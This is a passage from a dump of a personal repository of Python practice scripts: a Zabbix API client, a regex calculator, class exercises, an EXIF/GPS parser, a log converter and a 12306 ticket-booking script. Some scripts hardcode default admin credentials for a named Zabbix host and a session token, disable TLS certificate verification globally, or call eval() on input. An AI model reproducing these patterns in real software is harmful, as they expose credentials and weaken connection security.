\"/\" + filename\n# f = open(file,'r')\n# print file\n# while True:\n# line = f.readline()\n# if search in line:\n# print file\n# f.closed\n# break\n # print parent + \"/\" + filename\n\n\n\n# import pandas as pd\n# import codecs\n\n# xd = pd.ExcelFile('/Users/admin/Documents/work/日报-周报/运维日报(2017-09-15-贾文龙).xlsx')\n# df = xd.parse(xd.sheet_names, header=None, keep_default_na=True)\n# df = pd.read_excel('/Users/admin/Documents/work/日报-周报/运维日报(2017-09-15-贾文龙).xlsx', sheetname=0)\n# print df.dtypes\n\n# with codecs.open(\"/Users/admin/Documents/work/日报-周报/0915.html\", \"w\", \"utf-8\") as rb:\n# rb.write(df.to_html(header=False, index=False,))\n\n#\n# import xlrd\n# import datetime as dt\n# import os\n#\n# DT=dt.date.today().strftime('%Y-%m-%d')\n# file_name=\"/Users/admin/Documents/work/日报-周报/运维日报(\" + DT + \"-贾文龙).xlsx\"\n# md_file=\"/Users/admin/Documents/work/shells/rb.md\"\n#\n# rb=open(md_file,'w')\n# book = xlrd.open_workbook(file_name)\n# print \"The number of worksheets is\", book.nsheets\n# # print \"Worksheet name(s):\", book.sheet_names()[0]\n# sh = book.sheet_by_index(0)\n# # print sh.name, sh.nrows, sh.ncols\n#\n# for hang in range(0, sh.nrows):\n# if hang == 0 or hang == 1:\n# continue\n# for lie in range(0, sh.ncols):\n# if sh.cell_value(rowx=hang, colx=lie):\n# value = sh.cell_value(hang, lie)\n# if lie == 5:\n# print \"|\"\n# rb.write(\"|\" + '\\n')\n# if hang == 2 and lie == 5:\n# print \"|--|--|--|--|--|\"\n# rb.write(\"|--|--|--|--|--|\" + '\\n')\n# else :\n# print \"|\",\n# rb.write(\"|\")\n# # print(\"\\t%-30s\") % value.encode(\"utf-8\"),\n# print(\"%s\") % value.encode(\"utf-8\"),\n# rb.write(value.encode(\"utf-8\"))\n# rb.closed\n\n\n # print h, l\n# for rx in range(sh.nrows):\n# # print sh.row(rx)\n# h = sh.row(rx)\n# for i in h:\n# print i.dump(, header=False)\n\n\n# st = book.sheet_by_index(0)\n# print book.sheet_by_name(u'技术日报')\n# print book.sheet_names()\n# print book.sheet_names()[0]\n# print st.name, st.nrows, st.ncols\n\n\n# ##### 温度转换\n# def F2C(f):\n# C = (f - 32) * (5.0/9)\n# return str(C) + \"C\"\n# def C2F(c):\n# F = c * (9.0/5) + 32\n# return str(F) + \"F\"\n#\n# W = raw_input(\"请输入温度:\")\n# if W.endswith(\"C\"):\n# W = float(W.replace(\"C\", \"\"))\n# print(float(W),type(W))\n# print(C2F(W))\n# elif W.endswith(\"F\"):\n# W = float(W.replace(\"F\", \"\"))\n# print(float(W),type(W))\n# print(F2C(W))\n\n# #### 信用检查\n# def add(S):\n# sumh = 0\n# S = S.replace(\" \", \"\")\n# for i in S:\n# sumh += int(i)\n# return sumh\n#\n# def if_ok(str_list):\n# for string in str_list:\n# if len(string) == 4 and len(str_list) == 4 and string.isdigit():\n# if_or_not = True\n# else:\n# if_or_not = False\n# return if_or_not\n#\n# def check(S):\n# if S.startswith(\" \") or S.endswith(\" \") or S == \"\":\n# # return False\n# print(\"卡号输入错误!请重试!\")\n# L = S.lstrip().split()\n# if if_ok(L) :\n# resault = add(S)\n# if resault%10 == 0:\n# print(\"您的卡号为: %s\" % S)\n# # return True\n# else:\n# # return False\n# print(\"卡号输入错误!请检查!\")\n# else:\n# # return False\n# print(\"卡号输入错误!请检查!\")\n#\n# # print(check('9384 3495 3297 0121'))\n# check('9384 3495 3297 0121')\n# check('0000000000000000')\n\n\n# ####\n# l = [1,2,3,4,4,3,0,4]\n#\n# def max_num(n):\n# a = n\n# b = 0\n# if a > b:\n# max = a\n# return max\n#\n# max_num(1)\n# for i in l:\n# print l.count(i)\n# # print max(l.count(i))\n\n\n\n#\n# def outer():\n# x=100\n# def inner():\n# x+=100\n# print(x)\n# return inner\n#\n#\n# myx=outer()\n# myx()\n\n\nimport requests\nimport json\n\nZABIX_ROOT = 'http://zabbix.bqmart.cn/api_jsonrpc.php'\nurl = ZABIX_ROOT + '/api_jsonrpc.php'\n\n# user.login\npayload = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n 'user': 'admin',\n 'password': 'zabbix',\n },\n \"auth\": None,\n \"id\": 0,\n}\nheaders = {\n 'content-type': 'application/json',\n}\nreq = requests.post(url, json=payload, headers=headers)\nauth = req.json()\nprint('req:', req)\nprint('auth:', auth)\n\n# host.get\npayload = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"host.get\",\n \"params\": {\n 'output': [\n 'hostid',\n 'name'],\n },\n \"auth\": auth['result'],\n \"id\": 2,\n}\nres2 = requests.post(url, data=json.dumps(payload), headers=headers)\nres2 = res2.json()\nprint('res2:', res2)\n\nfor host in res2['result']:\n print(host['name'])\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4308888018131256, "alphanum_fraction": 0.45623520016670227, "avg_line_length": 21.930233001708984, "blob_id": "9b96f07bca3cc45bd9224a8ee348cd262a6c597f", "content_id": "ab53c5f7e098dc8a6c84ea55b726c95115dfc8f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2969, "license_type": "no_license", "max_line_length": 92, "num_lines": 129, "path": "/未定义项目练习/re_test.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport re\nimport os\nimport string\n\n\n# pattern = re.compile(r'hello')\n#\n# match1 = pattern.match('hello world!')\n# match2 = pattern.match('hellox world')\n# match3 = pattern.match('helllo world')\n#\n# if match1:\n# print match1.group()\n# else:\n# print 'Faile'\n#\n# if match2:\n# print match2.group()\n# else:\n# print 'Faile'\n#\n# if match3:\n# print match3.group()\n# else:\n# print 'Faile'\n#\n#\n# ret = re.findall('f(as)', 'xdfreadfasas')\n# print(ret)\n# print(os.getcwd())\n\n# striaaa = '((3+5*2/4)*3)*((2+7/3*5)-(4/2))'\n# rent = re.findall('\\([^()]+\\)', striaaa)\n# print 'source:', rent, striaaa\n\n# ret = re.search('\\([^()]+\\)', striaaa)\n# st = ret.group()\n# print 'source:', st, striaaa\n\ndef addminus(s):\n ret = re.search('\\d+\\.?\\d*[+-]\\d+\\.?\\d*', s)\n if ret:\n ret = ret.group()\n x, y = re.split('[+-]', ret)\n x = float(x)\n y = float(y)\n ysf = re.search('[+-]', ret).group()\n if ysf == '+':\n resault = x + y\n else:\n resault = x - y\n resault = str(resault)\n end = s.replace(ret, resault)\n if re.search('-\\d', end):\n # print '222', end\n return addminus(end)\n else:\n # print '1111', re.sub('[\\(\\)]', '', addminus(end))\n return re.sub('[\\(\\)]', '', addminus(end))\n else:\n return str(eval(s))\n\n\ndef chengchu(s):\n # global endend\n ret = re.search('\\d+\\.?\\d*[*/]\\d+\\.?\\d*', s)\n if ret:\n ret = ret.group()\n x, y = re.split('[*/]', ret)\n x = float(x)\n y = float(y)\n ysf = re.search('[*/]', ret).group()\n if ysf == '*':\n resault = x*y\n else:\n resault = x/y\n resault = str(resault)\n endend = s.replace(ret, resault)\n return chengchu(endend)\n else:\n return s\n\n\ndef check(s):\n ret = re.findall('([\\(\\)]+)', s)\n if ret:\n return 'True'\n if re.search('[*/]', s):\n ysf = re.search('[*/]', s).group()\n if ysf == '*':\n return '*'\n else:\n return '/'\n if re.search('[+-]', s):\n ysf = re.search('[+-]', s).group()\n if ysf == '+':\n return '+'\n else:\n return '-'\n\n\ndef js(s):\n if check(s) == 'True':\n rent = re.findall('\\([^()]+\\)', s)\n for i in rent:\n endrepl = chengchu(i)\n endall = addminus(endrepl)\n s = s.replace(i, endall)\n\n return addminus(s)\n elif check(s) == '*' or check(s) == '/':\n tmp = chengchu(s)\n if check(tmp) == '-' or check(tmp) == '+':\n return addminus(tmp)\n else:\n return tmp\n else:\n return addminus(s)\n\n\n# striaaa = '(((3+2*4*10)*(5-2+3*4)+100-12*4/6+40-100)-(8*9/5-10+50/4)+(10-5+4*8/2-20+5.5))'\nstriaaa = '((1+2)*(3-5)-10)+5'\nprint \"最终结果:\", striaaa, '=', js(striaaa)\n\n" }, { "alpha_fraction": 0.49356546998023987, "alphanum_fraction": 0.5280090570449829, "avg_line_length": 18.00719451904297, "blob_id": "700a5ba143908eb86a0de66c54e95ee202323803", "content_id": "265c44b59eb0a61182d33bfb6cb6bf7b8a4e2fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3186, "license_type": "no_license", "max_line_length": 91, "num_lines": 139, "path": "/python学习/面向对象学习/class_特殊成员.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-23\n\n__author__ = '@jiawenlong'\n\n\"\"\"\nclass Foo: # 特殊成员\n def __init__(self):\n print('init')\n\n def __int__(self):\n print(456)\n return 111\n\n def __str__(self):\n print('str')\n return 'jiawenlong'\n\n def __call__(self, *args, **kwargs):\n print('call', args, kwargs)\n\n\nobj = Foo() # 执行 init\nobj(123, a=3, b='c') # 执行 call\n\n# print(obj) # print(str(obj)) 执行obj中的 __str__ ; str(obj)\nstr(obj)\n# r = str(obj)\n# print(r)\n\n# print(int(obj)) 执行obj中的 __int__ ; int(obj)\nint(obj)\n# r = int(obj)\n# print(r)\n\n\n__dict__(): # 将对象中封装的所有内容,通过字典的形式返回\n\n\nclass Foo:\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __add__(self, other): # 可以是减、乘除等\n # self = obj1 ('name', 19)\n # other = obj2 ('jiawenlong', 20)\n return self.age + other.age\n # return Foo(other.name, self.age)\n\n def __del__(self): # 析构方法 对象被销毁时自动执行\n pass\n # print('析构方法')\n\n\n\n\nobj1 = Foo('name', 19)\nobj2 = Foo('jiawenlong', 20)\n\nr = obj1 + obj2\n# 两个对象相加,自动执行第一个对象的 __add__ 方法,并且将第二个对象作为参数传递进入\nprint(r) \n# print(r.name, r.age)\n\nd = obj1.__dict__ # 将对象中封装的所有内容,通过字典的形式返回\nprint(d)\nret = Foo.__dict__\nprint(ret)\n\n\nclass Foo:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __getitem__(self, item):\n # return item + 10\n if type(item) == slice: # li[1:2:3]\n print('\\n进行切片处理')\n print('start: %s' % item.start)\n print('end: %s' % item.stop)\n print('step: %s\\n' % item.step)\n else:\n print('进行索引处理')\n print(item, type(item))\n\n def __setitem__(self, key, value):\n print(key, value)\n\n def __delitem__(self, key):\n print(key)\n\n\nli = Foo('jia', 19)\nr = li[8] # 自动执行li对象的类中的 __getitem__ 方法,8 当参数传递给 item\n# print(r)\nli[1:3:2]\n\nli[100] = 'haha'\ndel li[999]\n\"\"\"\n\n\nclass Foo:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __iter__(self):\n # return iter([11, 22, 33, 44])\n return [11, 22, 33, 44]\n\n def __str__(self):\n return 'jiawenlong'\n\n\nli = Foo('Justin', 19)\n# 1 执行 li 对象的类中的 __iter__方法,并获取其返回值\n# 2 循环上一步中的返回对象\n\n# 如果类中 有 __iter__ 方法,创建的对象就是可迭代对象\n# 对于 可迭代对象.__iter__() 的返回值 是 迭代器\n# 对于 for 循环,遇到迭代器,执行迭代器的next方法 ; iter([11, 22, 33, 44]) 迭代器\n# 如果是可迭代对象,获取对象的 __iter__方法,然后执行迭代器的next方法 ;def __iter__(): return [11, 22, 33, 44], 可迭代对象\na = li.__iter__()\nprint(type(a))\n\nb = [1, 2, 3]\nprint(type(b))\n\nfor i in li.__iter__():\n print(i)\n\nname = li\nprint(name)\n" }, { "alpha_fraction": 0.49883225560188293, "alphanum_fraction": 0.5221871137619019, "avg_line_length": 23.928081512451172, "blob_id": "148ee459232c10a782d3cce1b346bb3279ce1e20", "content_id": "cde16fb4e4d489cafdce8c048b1aa1d8d04a0466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7301, "license_type": "no_license", "max_line_length": 96, "num_lines": 292, "path": "/python学习/面向对象学习/读取图片信息.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-05-22\n\n__author__ = '@jiawenlong'\n\n\nimport binascii\n\n\nclass ParseMethod(object):\n @staticmethod\n def parse_default(f, count, offset):\n pass\n\n @staticmethod\n def parse_latitude(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n latitude = [0, 0, 0]\n for i in xrange(count):\n byte = f.read(4)\n numerator = byte.encode('hex')\n\n byte = f.read(4)\n denominator = byte.encode('hex')\n\n latitude[i] = float(int(numerator, 16)) / int(denominator, 16)\n\n print('Latitude:\\t%.2f %.2f\\' %.2f\\\"' % (latitude[0], latitude[1], latitude[2]))\n f.seek(old_pos)\n\n @staticmethod\n def parse_longtitude(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n longtitude = [0, 0, 0]\n for i in xrange(count):\n byte = f.read(4)\n numerator = byte.encode('hex')\n\n byte = f.read(4)\n denominator = byte.encode('hex')\n\n longtitude[i] = float(int(numerator, 16)) / int(denominator, 16)\n\n print('Longtitude:\\t%.2f %.2f\\' %.2f\\\"' % (longtitude[0], longtitude[1], longtitude[2]))\n f.seek(old_pos)\n\n @staticmethod\n def parse_make(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(count)\n a = byte.encode('hex')\n print('Make:\\t\\t' + binascii.a2b_hex(a))\n f.seek(old_pos)\n\n @staticmethod\n def parse_model(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(count)\n a = byte.encode('hex')\n print('Model:\\t\\t' + binascii.a2b_hex(a))\n\n f.seek(old_pos)\n\n @staticmethod\n def parse_datetime(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(count)\n a = byte.encode('hex')\n print('DateTime:\\t' + binascii.a2b_hex(a))\n f.seek(old_pos)\n\n # rational data type, 05\n @staticmethod\n def parse_xresolution(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n byte = f.read(4)\n numerator = byte.encode('hex')\n byte = f.read(4)\n denominator = byte.encode('hex')\n xre = int(numerator, 16) / int(denominator, 16)\n\n print('XResolution:\\t' + str(xre) + ' dpi')\n f.seek(old_pos)\n\n @staticmethod\n def parse_yresolution(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n byte = f.read(4)\n numerator = byte.encode('hex')\n byte = f.read(4)\n denominator = byte.encode('hex')\n xre = int(numerator, 16) / int(denominator, 16)\n\n print('YResolution:\\t' + str(xre) + ' dpi')\n f.seek(old_pos)\n\n @staticmethod\n def parse_exif_ifd(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n\n byte = f.read(2)\n a = byte.encode('hex')\n exif_ifd_number = int(a, 16)\n\n for i in xrange(exif_ifd_number):\n byte = f.read(2)\n tag_id = byte.encode('hex')\n # print tag_id,\n\n byte = f.read(2)\n type_n = byte.encode('hex')\n # print type_n,\n\n byte = f.read(4)\n count = byte.encode('hex')\n # print count,\n\n byte = f.read(4)\n value_offset = byte.encode('hex')\n # print value_offset\n\n value_offset = int(value_offset, 16)\n EXIF_IFD_DICT.get(tag_id, ParseMethod.parse_default)(f, count, value_offset)\n\n f.seek(old_pos)\n\n @staticmethod\n def parse_x_pixel(f, count, value):\n print('X Pixels:\\t' + str(value))\n\n @staticmethod\n def parse_y_pixel(f, count, value):\n print('y Pixels:\\t' + str(value))\n\n @staticmethod\n def parse_gps_ifd(f, count, offset):\n old_pos = f.tell()\n f.seek(12 + offset)\n byte = f.read(2)\n a = byte.encode('hex')\n gps_ifd_number = int(a, 16)\n\n for i in xrange(gps_ifd_number):\n byte = f.read(2)\n tag_id = byte.encode('hex')\n # print tag_id,\n\n byte = f.read(2)\n type_n = byte.encode('hex')\n # print type_n,\n\n byte = f.read(4)\n count = byte.encode('hex')\n # print count,\n\n byte = f.read(4)\n value_offset = byte.encode('hex')\n # print value_offset\n\n count = int(count, 16)\n value_offset = int(value_offset, 16)\n GPS_IFD_DICT.get(tag_id, ParseMethod.parse_default)(f, count, value_offset)\n\n f.seek(old_pos)\n\n\nIFD_dict = {\n '010f': ParseMethod.parse_make,\n '0110': ParseMethod.parse_model,\n '0132': ParseMethod.parse_datetime,\n '011a': ParseMethod.parse_xresolution,\n '011b': ParseMethod.parse_yresolution,\n '8769': ParseMethod.parse_exif_ifd,\n '8825': ParseMethod.parse_gps_ifd\n}\n\nEXIF_IFD_DICT = {\n 'a002': ParseMethod.parse_x_pixel,\n 'a003': ParseMethod.parse_y_pixel\n}\n\nGPS_IFD_DICT = {\n '0002': ParseMethod.parse_latitude,\n '0004': ParseMethod.parse_longtitude\n}\n\nimage = '/Users/admin/Downloads/备案/阿里云背景照片.jpeg'\nwith open(image, 'rb') as f:\n byte = f.read(2)\n print('+++++byte', byte)\n print('+++++', bytes(byte))\n # a = byte.encode('hex')\n a = byte.hex()\n print('-----', byte.fromhex('4a464946'))\n print('SOI Marker:\\t' + a)\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('APP1 Marker:\\t' + a)\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('APP1 Length:\\t' + str(int(a, 16)) + ' .Dec')\n\n byte = f.read(4)\n # a = byte.encode('hex')\n a = byte.hex()\n print('-----', a)\n print('Identifier:\\t' + binascii.a2b_hex(a))\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('Pad:\\t\\t' + a)\n\n print()\n\n print('Begin to print Header.... ')\n\n print('APP1 Body: ')\n\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n print('Byte Order:\\t' + a)\n\n byte = f.read(2)\n a = byte.hex()\n # a = byte.encode('hex')\n print('42:\\t\\t' + a)\n\n byte = f.read(4)\n a = byte.hex()\n # a = byte.encode('hex')\n print('0th IFD Offset:\\t' + a)\n\n print('Finish print Header')\n\n print('Begin to print 0th IFD....')\n\n print()\n # print 'Total: ',\n byte = f.read(2)\n # a = byte.encode('hex')\n a = byte.hex()\n interoperability_number = int(a, 16)\n # print interoperability_number\n\n for i in xrange(interoperability_number):\n byte = f.read(2)\n tag_id = byte.hex()\n # tag_id = byte.encode('hex')\n # print tag_id,\n\n byte = f.read(2)\n type_n = byte.hex()\n # type_n = byte.encode('hex')\n # print type_n,\n\n byte = f.read(4)\n count = byte.hex()\n # count = byte.encode('hex')\n # print count,\n\n byte = f.read(4)\n value_offset = byte.hex()\n # print value_offset\n\n count = int(count, 16)\n value_offset = int(value_offset, 16)\n\n # simulate switch\n IFD_dict.get(tag_id, ParseMethod.parse_default)(f, count, value_offset)\n\n print()\n print('Finish print 0th IFD....')\n" }, { "alpha_fraction": 0.8372092843055725, "alphanum_fraction": 0.8372092843055725, "avg_line_length": 13.333333015441895, "blob_id": "325e2628e1d2595db14b0c7e5467d3475bc566f5", "content_id": "15eb9bf05984dc28ae8cbfeffae9ecd889c75220", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/README.md", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "# untitled\npython练习,项目未定义\n这是自己练习的小项目,项目未定义\n" }, { "alpha_fraction": 0.43250882625579834, "alphanum_fraction": 0.4395759701728821, "avg_line_length": 32.69047546386719, "blob_id": "d799b68b6026927b40853844e8a29a9bf62dfdd9", "content_id": "656b31291e74df9a29a8ded09a63ad7144009746", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "no_license", "max_line_length": 108, "num_lines": 42, "path": "/未定义项目练习/ipos_log.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-06-15\n\nimport json\n\njson_info = '/Users/admin/Documents/crt/json.log'\nlog = open(json_info, 'rb')\nend = open('/Users/admin/Documents/crt/end.txt', 'w+')\n\n# 读取每一行\nfor line in log.readlines():\n # 转换json 为字典\n json_s = json.loads(line)\n for k in json_s:\n if k == 'plain':\n Dict = json_s['plain']\n # print(Dict)\n # print(json.dumps(Dict, ensure_ascii=False))\n # ensure_ascii=False dumps 默认是使用ascii 对中文进行编码,这个参数禁止使用ascii对中文进行编码\n # 判断 字典 中是否 包含key值 payStatus\n if 'payStatus' in Dict.keys():\n Upay = \"(F\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] + \"'\" + \",\" + \"'\" + \\\n Dict['payStatus'] + \"'\" + \")\" + \",\"\n # print(Upay)\n end.write(Upay)\n end.write('\\n')\n # print(\"(F\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] + \"'\" + \",\" + \"'\" + \\\n # Dict['payStatus'] + \"'\" + \")\" + \",\")\n\n else:\n Upay = \"(S\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] \\\n + \"'\" + \",\" + \"'\" + \"'\" + \")\" + \",\"\n # print(Upay)\n end.write(Upay)\n end.write('\\n')\n # print(\"(S\" + \"'\" + Dict[\"outTradeNo\"] + \"'\" + \",\" + \"'\" + Dict[\"errCodeDes\"] \\\n # + \"'\" + \",\" + \"'\" + \"'\" + \")\" + \",\")\n\n# i = \"xxx\"\n# i.encode('utf-8')\n" }, { "alpha_fraction": 0.5357917547225952, "alphanum_fraction": 0.5813449025154114, "avg_line_length": 15.428571701049805, "blob_id": "eb80d918c3149cf5b81a82527251df6aed82869f", "content_id": "57301559128e577fbf36fafba7574e6632836cac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 561, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/python学习/函数/func.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/7/8 22:19\n\n\ndef logger(log_text):\n f = open(\"test.log\", 'a')\n f.write(log_text)\n f.close()\n print(log_text)\n\n\n# logger('Hello')\n\n\n# subroutine 【子程序】 , procedures 【过程】 函数\n# 作用: 减少重复代码、方便修改、更易扩展、保持代码一致性\n\ndef f(**kwargs):\n print(kwargs)\n\n\nzd = {'name': 'Jiawenong', \"age\": 31}\n\nf(**zd)\nf(**{'IP': '11.12.13.14', 'LocalName': 'Uinnova_Tarsier'})\n# ** 后面直接跟json格式字符串\n\n" }, { "alpha_fraction": 0.6167008876800537, "alphanum_fraction": 0.6721423864364624, "avg_line_length": 22.580644607543945, "blob_id": "2ec7c4fa124fd976f7e88adfc1ef5d3d049cf8c7", "content_id": "8a369733e2023c5a7cb4dc2a4ef389a951de35d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1499, "license_type": "no_license", "max_line_length": 143, "num_lines": 62, "path": "/12306/fuck12306_booking.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-11-27\n\n__author__ = '@jiawenlong'\n\nimport urllib2\nimport urllib\nimport ssl\nimport cookielib\nimport json\nimport sys\n# from fuck12306_login import opener\n\n\n\n### cookie 生成\nc = cookielib.MozillaCookieJar()\nc.load('cookie.txt', ignore_discard=True, ignore_expires=True)\ncookie = urllib2.HTTPCookieProcessor(c)\nopener = urllib2.build_opener(cookie)\n\n# 忽略证书认证\nssl._create_default_https_context = ssl._create_unverified_context\n\ncheck_user = 'https://kyfw.12306.cn/otn/login/checkUser'\norder_ticket = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'\nrefer = 'https://kyfw.12306.cn/otn/leftTicket/init'\n\n\ndef add_header(req, url):\n # 对请求 添加 header\n req.add_header('User-Agent',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36')\n req.add_header('Referer', url)\n req.add_header('Host', 'kyfw.12306.cn')\n\n\n\nreq = urllib2.Request(order_ticket)\n# data = {\n# '_json_att': ''\n# }\ndata = {\n 'secretStr': 'rbg8kDTTZO8TcRFcrn/6HFDFTNQhhV9iuiQbamUbHKg0GKJgbl2I5vCnVl9nKz/0jWJNlO5VcS0uRDTKxwRA0kZr6uYq5KewILynD+NfoMdjqU7IU+mE3MtrqDvvGBmGg0NsDQ/8xleae34fHtY7G/SEeMU4mRAb/1KRTLstzvPVsE/7tftaQHiOK1BvYJdFIuflwtBYuJyVdqdpZtH22PS7gx9XnJ0FDauBXjU51V81uEEtxu/KOw==',\n 'train_date': '2017-12-05',\n 'back_train_date': '2017-12-05',\n 'tour_flag': 'dc',\n 'purpose_codes': 'ADULT',\n 'query_from_station_name': '北京',\n 'query_to_station_name': '天津',\n 'undefined': ''\n}\ndata = urllib.urlencode(data)\nprint req, data\nadd_header(req, refer)\n\n\nprint req.headers\nresault = opener.open(req, data=data)\nprint resault.read()" }, { "alpha_fraction": 0.521268904209137, "alphanum_fraction": 0.541456401348114, "avg_line_length": 13.913978576660156, "blob_id": "8b5690d4d78605e087d1511f3dbe17c441a840c1", "content_id": "198a12db57c8f670787444de3c1778642c0d129e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1615, "license_type": "no_license", "max_line_length": 51, "num_lines": 93, "path": "/python学习/面向对象学习/class_成员修饰符.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-23\n\n__author__ = '@jiawenlong'\n\n\"\"\"\n# 私有字段,私有静态字段\nclass Foo:\n __country = \"__中国\" # 私有静态字段\n country = \"中国\"\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n self.__age = age # 私有字段 外部无法字节访问 ;__ 成员修饰符\n\n # 私有字段的调用\n def show(self):\n return self.__age\n\n # 私有静态字段的调用\n def show_country(self):\n return Foo.__country\n\n @staticmethod\n def show2_country():\n return Foo.__country\n\n\nobj = Foo('jiawenlong', 19)\n\n# 普通字段引用\nprint(obj.name)\nprint(obj.age)\n# 私有字段引用\nret = obj.show()\nprint(ret)\n\n# 静态字段引用\nprint(Foo.country)\n# print(obj.country)\n# 私有静态字段引用\nret = obj.show_country()\nprint(ret)\n\n# 静态方法用于待用私有静态字段\nprint(Foo.show2_country())\n\"\"\"\n\n'''\n# 方法的私有化\nclass Foo:\n def __f1(self):\n return 123\n\n def f2(self):\n r = self.__f1()\n return r\n\n\nobj = Foo()\nret = obj.f2()\nprint(ret)\n'''\n\n\n# 继承的私有,私有无法继承\nclass F:\n def __init__(self):\n self.__gr = 123\n self.gr = 456\n\n def showm(self):\n return self.__gr\n\n\nclass S(F):\n def __init__(self, name):\n self.name = name\n self.__age = 18\n super(S, self).__init__()\n\n def show(self):\n print(self.name)\n print(self.__age)\n print(self.gr)\n print(self.showm())\n\n\ns = S('jiawenlong')\ns.show()\n" }, { "alpha_fraction": 0.483152836561203, "alphanum_fraction": 0.5018050670623779, "avg_line_length": 13.972972869873047, "blob_id": "987e4e089cd9776f86bfc2fb6ba63998159afaf2", "content_id": "27b35ba20bb6433565d101195f893f7ba68f0a79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1872, "license_type": "no_license", "max_line_length": 52, "num_lines": 111, "path": "/python学习/面向对象学习/class_继承.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-19\n\n__author__ = '@jiawenlong'\n\n\n# class Father: # 父类、基类\n#\n# def basketball(self):\n# pass\n#\n# def football(self):\n# pass\n#\n# def smoke(self):\n# pass\n#\n# def drink(self):\n# pass\n#\n#\n# class Son(Father): # 和 Father 建立 关系 ,即子类、派生类\n# def bj(self):\n# pass\n\n#\n# class F:\n# def f1(self):\n# print('F.f1')\n#\n# def f2(self, name):\n# print('对 %s' % name)\n#\n#\n# class F1:\n# def f3(self):\n# print('F.f3')\n#\n#\n# class S(F, F1):\n# def s1(self, s):\n# print('%s' % s, end='')\n#\n# def f2(self, name):\n# print('%s' % name)\n# # super(S, self).f1() # 既执行子类方法,也执行父类相同方法\n# F.f2(self, name) # 还可以这样执行父类方法\n#\n#\n# s = S()\n# s.s1(\"贾文龙\")\n# s.f2('是好人')\n\n\n# 多继承 优先左边往上执行,如果有公用基类,先走左边,没有找到方法后,走右边执行,最终执行基类\n# class F0:\n# def a(self):\n# print('F1.a')\n#\n#\n# class F1(F0):\n# def a(self):\n# print('F1.a')\n#\n#\n# class F2:\n# def a(self):\n# print('F2.a')\n#\n#\n# class S(F1, F2):\n# pass\n#\n#\n# obj = S()\n# obj.a()\n\n\n# 多继承例子\nclass Base:\n def __init__(self):\n print('Base.init')\n\n\nclass RequestHandler(Base):\n def __init__(self):\n Base.__init__(self)\n print('RequestHandler.init')\n\n\n def save_forever(self):\n print('RequestHandler.save_forever')\n person.process() # self.process()\n\n def process(self):\n print('RequestHandler.process')\n\n\nclass Minx():\n def process(self):\n print('Minx.process')\n\n\nclass Son(Minx, RequestHandler):\n pass\n\n\nperson = Son()\nperson.save_forever()\n" }, { "alpha_fraction": 0.48550572991371155, "alphanum_fraction": 